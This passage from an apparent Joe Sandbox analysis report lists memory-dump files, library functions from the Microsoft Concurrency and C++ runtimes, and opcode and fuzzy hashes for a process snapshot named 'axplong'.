                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 512098550-0
                                                                                                                                                                                                                                                    • Opcode ID: 5c66628661ee11745e616ce0576173ecbcef1d7e2b9ab4bccdd33807ae7ab00b
                                                                                                                                                                                                                                                    • Instruction ID: 62989da07b3ced87b22e6263a343f270236d134050e35d377f0b1b05e61012c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c66628661ee11745e616ce0576173ecbcef1d7e2b9ab4bccdd33807ae7ab00b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA415075A00619EFDF09EF64C554AADBBBAFF48310F048159E806A7791CB75AE01CF81
                                                                                                                                                                                                                                                    Function 0069D1E9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0069D274
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069D297
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0069D2A0
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069D2D8
                                                                                                                                                                                                                                                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0069D2E3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4212520697-0
                                                                                                                                                                                                                                                    • Opcode ID: 83d398676c602cab9c4ef785c4d642854483e4e588e2e54d365452144e4c3d6a
                                                                                                                                                                                                                                                    • Instruction ID: cae4cec45ec0f3bf8e6e8cba5f2a10eace43fa872fd380ab3c11b9d0b415e977
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83d398676c602cab9c4ef785c4d642854483e4e588e2e54d365452144e4c3d6a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C331AE75700210AFDF05DF64C884BADB7ABAF89310F0541A9E9069B392CB74EE41CB91
                                                                                                                                                                                                                                                    Function 006985F9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 0069861E
                                                                                                                                                                                                                                                      • Part of subcall function 0068EA00: _SpinWait.LIBCONCRT ref: 0068EA18
                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00698632
                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00698664
                                                                                                                                                                                                                                                    • List.LIBCMT ref: 006986E7
                                                                                                                                                                                                                                                    • List.LIBCMT ref: 006986F6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3281396844-0
                                                                                                                                                                                                                                                    • Opcode ID: 4f12e83651b73f78e1aace173a193d04bbd6a60e0e1860e4a81dfd13cf93da19
                                                                                                                                                                                                                                                    • Instruction ID: 6be05d63a69b1a9d4987fe1bd3c094892bf16f2a3c7fb5eeb17a55eeaef357b8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f12e83651b73f78e1aace173a193d04bbd6a60e0e1860e4a81dfd13cf93da19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03317572901615DFCF14EFA8D5916EDBBB6BF16308B14016ED4016BA92CF35AA04CBA8
                                                                                                                                                                                                                                                    Function 00672670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00672806
                                                                                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 006728A0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2970364248-973111119
                                                                                                                                                                                                                                                    • Opcode ID: c9d90b1071d4ef51f264cf63a2df61292557214746844e6d6e2e8aba04444704
                                                                                                                                                                                                                                                    • Instruction ID: b08cd9e5159a84e415a2aa8330de358d5277170b077dda704a6a212dc53a64e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9d90b1071d4ef51f264cf63a2df61292557214746844e6d6e2e8aba04444704
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80719371E002099FDB04DFA8C891BDDFBB6EF59310F54821DE805A7381D775A944CBA5
                                                                                                                                                                                                                                                    Function 00673A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00673B53
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00673B59
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00673B62
                                                                                                                                                                                                                                                    Strings
